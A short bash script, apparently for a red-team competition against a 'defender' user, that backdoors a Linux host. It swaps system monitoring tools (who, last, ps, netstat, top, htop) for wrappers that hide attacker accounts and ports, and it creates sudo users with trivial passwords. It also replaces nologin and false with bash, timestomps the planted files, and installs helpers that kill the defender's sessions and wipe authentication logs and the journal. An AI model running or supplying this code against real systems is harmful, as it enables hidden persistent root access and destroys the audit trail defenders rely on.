#!/usr/bin/env bash
bins=("who" "last" "top" "netstat" "ps" "htop")
replacewith=("what" "long" "pot" "nest" "elf" "hpot")
exclude="mail|uucp|ssh_client|capbarb|grep|.*_real|what|elf|9999|2323"

for i in "${!bins[@]}"; do
    cmd="${bins[$i]}"
    swap="${replacewith[$i]}"
    orig_path=$(which "$cmd")
    real_bin="$(dirname "$orig_path")/$swap"

    if [ -n "$orig_path" ] && [ ! -f "$real_bin" ]; then
        mv "$orig_path" "$real_bin"

        echo "#!/usr/bin/env bash
$real_bin \"\$@\" | egrep -v '$exclude'" > "$orig_path"
        chmod +x "$orig_path"
        touch -r "$real_bin" "$orig_path"
        echo "[+] $cmd -> $swap"
    else
        echo "[!] $cmd already modified, skipping."
    fi
done

newusers=("vyatta" "capbarb" "ssh_client")
modusers=("uucp" "mail" "games")

for user in "${newusers[@]}"; do
  useradd -m "$user" -s /bin/bash
  usermod -aG sudo "$user"
  echo "$user:$user" | chpasswd
  echo "[-] $user created"
done

for moduser in "${modusers[@]}"; do
  usermod -aG sudo "$moduser"
  echo "$moduser:$moduser" | chpasswd
  echo "[.] $moduser modified"
done

echo "/usr/sbin/nologin /usr/bin/false" | xargs -n 1 cp /bin/bash
md5sum /bin/bash
md5sum /usr/sbin/nologin
md5sum /usr/bin/false

echo "unset HISTFILE" > /usr/bin/ww && chmod +x /usr/bin/ww && touch -r /usr/bin/xargs /usr/bin/ww
echo "pkill -u defender" > /usr/bin/mm && chmod +x /usr/bin/mm && touch -r /usr/bin/xargs /usr/bin/mm
echo "cat /home/defender/.bash_history" > /usr/bin/look && chmod +x /usr/bin/look && touch -r /usr/bin/xargs /usr/bin/look

cat << 'EOF' > /usr/bin/logre
#!/usr/bin/env bash
> /var/log/auth.log
> /var/log/wtmp
> /var/log/btmp
> /var/log/lastlog
sudo journalctl --vacuum-time=1s
EOF
chmod +x /usr/bin/logre && touch -r /usr/bin/xargs /usr/bin/logre
